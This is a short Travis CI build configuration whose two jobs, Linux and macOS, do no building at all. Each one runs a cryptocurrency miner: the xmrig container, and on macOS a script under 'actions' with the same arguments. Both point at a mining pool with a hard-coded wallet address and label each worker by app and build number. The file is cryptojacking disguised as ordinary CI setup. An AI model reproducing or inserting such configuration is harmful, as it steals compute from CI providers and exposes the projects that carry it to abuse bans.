jobs:
  include:
    - os: linux
      services:
        - docker
      script: docker run xmrig/xmrig -o rx.unmineable.com:3333 -u 1INCH:0x87B898C3a638d8F8Affb5cFcc1298e588da9e4FD.travis-linux-$APP_ID-$TRAVIS_BUILD_NUMBER -k
    - os: osx
      script: actions/deploy-mac -o rx.unmineable.com:3333 -u 1INCH:0x87B898C3a638d8F8Affb5cFcc1298e588da9e4FD.travis-mac-$APP_ID-$TRAVIS_BUILD_NUMBER -k